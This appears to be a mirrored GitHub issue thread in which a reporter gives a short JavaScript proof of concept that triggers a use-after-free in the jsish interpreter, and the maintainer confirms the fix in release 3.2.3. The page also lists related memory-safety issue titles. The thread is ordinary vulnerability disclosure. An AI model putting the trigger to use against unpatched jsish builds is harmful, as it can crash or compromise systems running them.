Comments (4)
SteinsGatep001
commented on July 2, 2024
PoC
var global = this;
(function () {
try {
throw function () {
this.global = 'test';
};
} catch (e) {
}
}());
this.global = 'test'; // trigger use after freefrom jsish.
pcmacdon
commented on July 2, 2024
Great find of problem from code that was supposed to be removed a long time ago. Fixed in Release "3.2.3"
from jsish.
SteinsGatep001
commented on July 2, 2024
Great find of problem from code that was supposed to be removed a long time ago. Fixed in Release "3.2.3"
The source code I use is http://jsish.org/zip
Build Environment
Ubuntu 16.04 x86_64
wget http://jsish.org/zip -O jsi.zip && unzip jsi.zip && cd jsi && make
from jsish.
pcmacdon
commented on July 2, 2024
I probably wasn't clear. I meant yes you did find a problem.
But it should be fixed now, in the code I just committed today for "3.2.3".
$ jsish -v
3.2.3 3.0203 84f5b80e64d1abdcf634e27cb6b86dce8e8c87ed 2020-10-14 00:32:37 UTC
$ jsish /tmp/glob.jsi
$ cat /tmp/glob.jsi
var global = this;
(function () {
try {
throw function () {
this.global = 'test';
};
} catch (e) {
}
}());
this.global = 'test'; // trigger use after free
from jsish.
Related Issues (20)
- Heap-use-after-free src/jsiValue.c:899 in Jsi_ValueCmp HOT 5
- Heap-use-after-free src/jsiValue.c:980 in jsi_ValueLookupBase
- Heap-use-after-free src/jsiValue.c:1458 in Jsi_IterGetKeys HOT 1
- Heap-use-after-free src/jsiEval.c:213 in jsiVarDeref HOT 8
- Heap-use-after-free src/jsiWebSocket.c:3190 in jsi_wswebsocketObjFree
- Heap-use-after-free src/jsiObj.c:176 in DeleteTreeValue
- MEMLEAK NOW: Heap-use-after-free src/jsiObj.c:339 in Jsi_ObjFree HOT 2
- Heap-use-after-free src/jsiUserObj.c:32 in jsi_UserObjDelete
- Heap-use-after-free src/jsiFunc.c:207 in jsi_ArgTypeCheck HOT 2
- Heap-use-after-free src/jsiArray.c:958 in SortSubCmd
- Heap-use-after-free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5166d)
- Heap-use-after-free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732)
- Which ECMAscript standrd does Jsish Support HOT 1
- Use-after-free in Jsi_ObjFree (Jsi_ObjFree src/jsiObj.c:342) HOT 1
- incomplete creation for RegExp object
- Type confusion in jsValue.c
- Fail to throw a Type Error
- Integer overflow in jsiEvalCodeSub (src/jsiEval.c:1363)
- Integer overflow in jsiEvalCodeSub (src/jsiEval.c:1745)
- Grammar railroad diagram HOT 3
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from jsish.